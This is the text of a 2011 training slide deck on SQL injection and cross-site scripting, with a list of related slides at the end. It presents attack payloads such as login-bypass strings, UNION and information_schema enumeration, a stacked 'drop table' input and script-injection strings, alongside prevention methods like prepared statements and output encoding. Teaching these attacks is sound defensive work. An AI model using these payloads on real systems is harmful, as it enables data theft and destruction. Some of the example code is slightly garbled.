sql injection & xss slides

Understanding SQL Injection

(Prevention Mechanism)Adzmely Mansor

adzmely@gmail.com

Tuesday, May 17, 2011

Purpose

• understanding

• pen-test existing internal application

• good practice / methods sql injection prevention in programming

• “ Not a license to KILL !!!”

SQL Injection

• How strong Firewall rules - easily walk through port 80

• Inserting SQL meta-characters/commands into web based input methods: {‘GET’,‘POST’}

• Well known and exploited technique

SQL Injection

Port80/443

Firewall

WebServer

Openly launch attack from compromised server

MaliciousUser

A Threat?

• Albert Gonzalez

• 130 millions credit card number

• Used SQL - Injection technique

• Steal data from internal corporate network

• Sentenced 20 years in March 2010

• x-Informer to US secret service to catch hackers

A Threat?

• Sept 19, 2010 during Swedish General Election a voter attempted a code injection as part of a write in vote.

SQL Injection? How?http://victim.org/news.php?id=234

SELECT * FROM News where news_id = $_GET[‘id’]

SELECT * FROM News where news_id = 234

SQL Injection? How?http://victim.org/news.php?id=234 and 1=1

SELECT * FROM News where news_id = $_GET[‘id’]

SELECT * FROM News where news_id = 234 and 1=1

Sample Attacks

• comments/inline comments

• admin’ --

• select username,password where username=‘admin’-- ’ and password=‘pass’;

Sample Attacks

• comments/inline comments

• ‘ or 1=1--

• select username,password where username=‘admin’ and password=‘’ or 1=1-- ’;

SQL Injection: 3 types

• Inband: extracted using same channel

• Out-of-band: extracted using different channel - email

• Inferential: no actual data transfer, behavior observation

Blind SQL Injection

• results not visible to attacker

• logical statement to attack

• time consuming/intensive

• heavy load on web server from single source of IP

• automation tools - sqlmap/sqlplus/etc

Blind SQL Injection

• Conditional Test

• and 1=1 / and 1=2

• Conditional Errors

• select 1/0 from users where username=‘user1’;

• Time Delay

• measure execution time

Vulnerability Testing

• GET/POST methods

• unescaped numerical value

• single quote unescaped string

• double quotes unescaped string

• etc

Vulnerability Testing

• look for

• page errors? - 500 Server Error

• redirect page?

• SQL/ODBC Errors

• page differences

• ‘ and 1=1-- , ‘ and 1=2--

Test for SQL Injection

• unescaped numerical

• select * from news where id = $_GET[id]

• add some sql statement / blind?

• ?id=23 and / ?id=23 and {1=1,1=2}

• error?

• differences

• unescaped numerical

• Open Lesson 1a URL

• do some test

• try to detect sql injection vulnerability

• try to exploit

• unescaped numerical with addslashes() or magic quotes?

• select * from news where id = addslashes($_GET[id])

• try to do same test in Lesson 1b URL

• injectable?

• unescaped single quote - ‘

• select * from news where id = ‘$_GET[id]’

• using single quote to produce error / differences

• try to inject with some simple blind technique

• unescaped single quote ‘

• Open Lesson 2a URL

• do some test

• try to exploit

• unescaped double quotes - “

• select * from news where id = “$_GET[id]”

• using single quote to produce error / differences

• try to inject with some simple blind technique

• unescaped double quotes “

• Open Lesson 2b URL

• do some test

• try to exploit

• unescaped statement with parentheses

• update users set password=md5($_POST[‘pass’]) where id = ....

• injectable

• pass = abc); --

• POST Method

• Open Lesson 3 URL

• do some test

In Band: Stealing Data

• getting table list

• find how many columns in query

• use union select

• find database name: mysql database() function in union select

• use mysql information_schema tables

• use group_concat in query

• finding how many columns in query

• using ORDER by

• ORDER by 1--

• ORDER by 2--

• ORDER by 3--

• errors means found the number of selected columns

• finding how many columns in query

• using union + select

• use dummy strings to find number of columns in query

• using group concat

• SELECT group_concat(name) from users;

• return query data’s in single column

• getting table list from information_schema.tables

• SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = “dbname”;

• getting table columns from information_schema.columns

• SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = “tname”;

• Exercise: Open any previous Lesson URL

• retrieve passwords from un-named tables in the same DB

Stacking Queries

‘ ; drop table users; -- supported not supported unknown

Random Test

• Choose your internal website

• search for sql injection possibilities

• do some penetration test

SQL Injection Tools

• sqlmap

• python base

• CLI - command line interface

• fully automated penetration test

• DB finger prints

• DB, Tables enumerations

Prevention

• Whose Responsibility?

• No SQL database, connector, or framework can prevent SQL injection all the time

• Security is the application developer’s job

Monitoring

• Never reveal error messagesYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

INSERT INTO user (username, password, admin) VALUES ('Mr. O'Neil', 'password', false);

Not only does this confuse/anger the visitor, but reveals sensitive information about your application

if (! $query) {

die (“Error: ” mysql_error() );

} ....

This is BAD

Monitoring

• Error Handling

• Never show errors in production

• Log errors so they can be fixed or email them

• Check Regularly

• This way, you will see potential bugs/security holes, and you can fix them promptly.

Log Error

function sql_failure_handler($query, $error) {

$msg = htmlspecialchars (“Failed Query: {$query}<br>SQL Error: {$error}”);

error_log ($msg, 3, “/home/site/logs/sql_error_log”);

if ( defined(‘debug’) ) {

return $msg;

return “Requested page is temporarily unavailable, please try again later.”;

mysql_query ( $query ) or die(sql_failure_handler($query, mysql_error()));

Prevention

“Escaping Input PreventsSQL Injection.”

Prevention

• Simply adding addslashes() or magic_quotes enough?

• $id = addslashes($_GET[‘id’]) ?

Escaping & Filtering<?php

$id = $_GET[“id”];$category = $_GET[“category”];

$sql = “SELECT * from News WHERE id = {$id} AND category = ‘{$category}’”;

mysql_query ($sql) or die(sql_failure_handler($query, mysql_error()));

Escaping & Filtering

SELECT * from NewsWHERE id = 254AND category = ‘ict’

type casting - integer

escape special characterby using backslash

Escaping & Filtering<?php

$id = (int) $_GET[“id”];$category = mysql_real_escape_string($_GET[“category”]);

$sql = “SELECT * from News WHERE id = {$id} AND category = ‘{$category}’”;

mysql_query ($sql) or die(sql_failure_handler($query, mysql_error()));

Escaping Methods• mysql_real_escape_string()

• addslashes()

• Class Object method such PDO

• $pdo->quote()

• method not available to all DB types !!!

• multiple escaping method?

• No. One is enough!

Prevention

• using addslashes() ? - unescaped numerical

$qry = "SELECT * FROM\ tblTest WHERE \ TestID = " . addslashes($_GET['id']);

What addslashes() do?problem solved?

Prevention

• using mysql_real_escape_string() ? - on unescaped numerical

$sql = "SELECT * FROM tblTest WHERE TestID=".mysql_real_escape_string($_GET['id']);

What mysql_real_escape_string() do?problem solved?

Prevention

• unescaped numerical - use type casting

(int) $_GET[‘id’]

Magic Quotes

• Cannot simply rely on Magic Quotes

• Turning On Magic Quotes will not solved all your problems - eg: unescaped numerical variable

Prevention

• Quoting all arguments

• since single quotes are always escaped, combining with addslashes or mysql_real_escape_string this technique prevents SQL Injection

• however for numerical always numeric casting

Like Quadary

• SELECT * messages WHERE subject LIKE ‘{$sub}%’

• % used as wild card

• _ (underscore) represent any character

• $sub = mysql_real_escape_string(“%_”)

• still %_ - no changes

Like Quadary

• large amount of data queried

• more memory usage

• slow down database

• slow down process / server

• possibilities of Denial of Service (DOS) attack

Like Quadary

• Solution - addcslashes()

• customs escaped characters

$sub = addcslashes (

mysql_real_escape_string(“%something...”),

”%_”);

The Best Solution

• Use Placeholder/Paramater - eg: PHP MySQL/PDO

$stmt = $pdo->prepare("SELECT * FROM fruit WHERE name = ?"); $stmt->execute(array("Apple"));

You don’t need to deal with escaping data because it’s done by the PDO library.

• Code Quality also Increases

• No more nasty concatenation

• No more hoping every programmer escaped query properly

Parameter Placeholder

• Query need a dynamic value:

SELECT * from NewsWHERE id = 254

user input

• Query parameter takes place of dynamic value:

SELECT * from NewsWHERE id = ?

parameter placeholder

• How the database parse it

SELECT

expr-list

simple-table

equality

parameter placeholder

• How the database execute it

SELECT

expr-list

simple-table

equality

parameter value

• Interpolation

SELECT

expr-list

simple-table

News equality

SQL Injection

• How the database execute it

SELECT

expr-list

simple-table

equality

TRUEno parameter can change the tree

“Query Parameter Prevent SQL Injection.”

Whitelist Map

http://example.org/news.php?sort=date&dir=up<?php

$sortorder = $_GET[“sort”];$direction = $_GET[“dir”];

$sql = “SELECT * FROM News ORDER BY {$sortorder} {$direction}”;

$query = mysql_query($sql);

unsafe

sql injection

Whitelist Map

Fix with a Whitelist Map<?php

$sortorders = array ( “status” => “status”, “date” => “sysdate”);

$directions = array ( “up” => “ASC”, “down” => “DESC”);

$sortorder_default = “status”;$direction_default = “ASC”;

Whitelist Map

Map User Input to Safe SQL<?php

if ( isset ( $sortorders [ $_GET[“sort”] ] ) ){ $sortorder = $sortorders [ $_GET[“order”] ];} else { $sortorder = $sortorder_default;}

Whitelist Map

Map User Input to Safe SQL<?php

if ( isset ( $directions [ $_GET[“dir”] ] ) ){ $direction = $directions [ $_GET[“order”] ];} else { $direction = $direction_default;}

Whitelist Map

Interpolate Safe SQL<?php

$sql = “SELECT * FROM News ORDER BY {$sortorder} {$direction}”;

$query = mysql_query($sql);

whitelisted values

Prevention

• Limited Database User Access

• GRANT specific permissions

• DROP, CREATE, etc should be revoked from connected DB user

Cross Site ScriptingXSS

XSS : Definition

• computer security vulnerability in web application

• where information from one context where it is not trusted is injected to another context where it is trusted

• from this trusted context and attack can be started

XSS : Example

• simple web application that directly output the user supplied URL parameter

• open lesson1.php?name=Abu

• Selamat Datang Abu

<?phpecho “Selamat Datang “ . $_GET[‘name’];

XSS : Example

• javascript injection:

lesson1.php?name=</script>alert(/XSS/);</script>

XSS Threat

• XSS is most common injection vulnerability

• Direct output of user input allows injection of arbitrary content into website

• HTML tags

• Active content (Javascript / Flash)

• Firewall?

• via port 80

Reflective XSS

• Simplest form of XSS

• User input is read from the request parameters and written directly into the output

• Included malicious code is executed within the browser

• Victim’s browser has to execute the XSS triggering request itself

Persistent XSS

• Stored / permanent XSS

• User input is read from a request and stored in RAW

• database

• file

• etc

• example: comments in a blog

Persistent XSS

• victim’s browser visit a website

• stored user input is read from database and directly written into the output

• embedded malicious code get executed within victim browser

DOM based XSS

• is similar to reflective XSS

• but server side doesn’t play a role

• fault is within javascript code

• victim’s browser must execute the XSS request itself

DOM based XSS

• usually triggered by working with URL parameters/URL anchors in Javascript

• XSS caused by output in HTML context

• XSS caused by evaluating - JS eval() injection

XSS Dangers

• Displaying annoying pop-ups

• Redirect - malware

• Modification of text and images (defacement)

• Manipulation of client side application logic

• Theft of clipboard, cookies, passwords

• XSS traverse firewalls - port 80/443

XSS Test

• Displaying pop-ups

• most commonly used for diagnose and demonstration of XSS problems

• harmless

• just uses the javascript alert() function

• <script>alert(1);</script>

XSS: Redirection

• used by spammers and malware industry

• harmless if redirect for advertisement purposes

• dangerous if redirected to malware / exploits

XSS: Redirection

• Just modifies document.location

XSS: Cookies Theft

• allow theft of authentication information or session identifiers stored in cookie

• doesn’t work with httpOnly cookies

XSS: Cookies Theft

• just send document.cookie to the attacker

XSS: Clipboard Theft

• Allow theft of sensitive data from user’s clipboard

• Uses clipboardData object in Internet Explorer

• Triggers a security question since IE 7

XSS: Clipboard Theft

• IE 7

XSS: Theft of Passwords

• Mozilla Firefox comes with password safe

• Known password are filled into form after page fully loaded

• With XSS attackers passwords cached can be stolen

XSS: Manipulating Logic

• Example:

• Fill in support ticket with injectable XSS persistent method

• Support engineer open ticket

• steal cookies

• change submit action - onSubmit eventhandlet

Different HTML contexts

• Outside of HTML tags

• Within HTML tags

• Within URL HTML tag attributes

• In stylesheet attributes/tags

• In javascript / javascript strings

Injection outside HTML tags

• Raw user input is inserted between HTML tags

• Injection of new HTML tags

<body> ... Hello <?php echo $_GET[‘name’]; ?> !</body>

<body> ... Hello <script>.....</script> !</body>

• Filter function strip_tags() remove html tags

• In the output all <script> tags are removed

<body> ... Hello <?php echo strip_tags($_GET[‘name’]); ?> !</body>

• The encoding function htmlspecialchars() encodes special characters into HTML entities (or htmlentities())

• In the output special chars are disarmed

<body> ... Hello <?php echo htmlspecialchars($_GET[‘name’]); ?> !</body>

<body> ... Hello <script> .... </script> !</body>

Injection within HTML tags

• Raw user input is inserted within a HTML tag attribute

• Injection with eg. an event-handler

• Encoding functions not protecting at all in case of non standard HTML

• Injection always possible because no quotes are used around attribute values

• HTML attribute values should be within double quotes “”

• Use encoding functions as protection and encode the appropriate quotes

• Injection is no longer possible because breaking out the attribute context is not possible

Injection within URL attribute

• Raw URLs is inserted into HTML tag URL atribute

• Injection: eg. Javascript URLs

<a href=”<?php echo $_GET[‘b’]); ?>”> Click Here </a>

<a href=”javascript: alert(123);”> Click Here </a>

Injection within URL attribute

• To secure the output, encoding function must be used but they are not sufficient

• XSS problem is not the possibility to break out attribute value, but the URL type - javascript

• input filter should use a whitelist of allowed URL types

Injection in Stylesheet

• Raw user input is inserted into information

• Injected are IE expression, Javascript URLs or Mozilla’s moz-binding

Injection in Javascript

• Raw user input is inserted into javascript

• Injection is normal Javascript

Thank Youhttp://blog.xjutsu.comadzmely@gmail.com

sql injection & xss slides

Documents

webvulnerability scanning report · boolean-based blind sql...

common websites security issues - il...

sql injection and xss - owasp · sql injection and xss how...

xss injection vulnerabilities

xss and sql injection vulnerabilities

secure development and the sdlc - owasp development and the...

automatic creation of sql injection and cross-site scripting...

project 7 discussion section xss and sql injection in rails

cse 127: computer security sql injection · the database....

cs#161:#computer#security prof.(raluca...

exploitation of injection and xss

web security: injection attacks · • sql injection –...

sql injection and xss

server-side web security: sql injection attacks &...

xss and html code injection

cscd 303 essential computer security winter 2014 lecture 12...

why haven't we stamped out sql injection and xss yet

why haven’t we stamped out sql injection and xss yet?

session id: session classification: romain gaucher coverity...

php security computer security. overview xss, css ...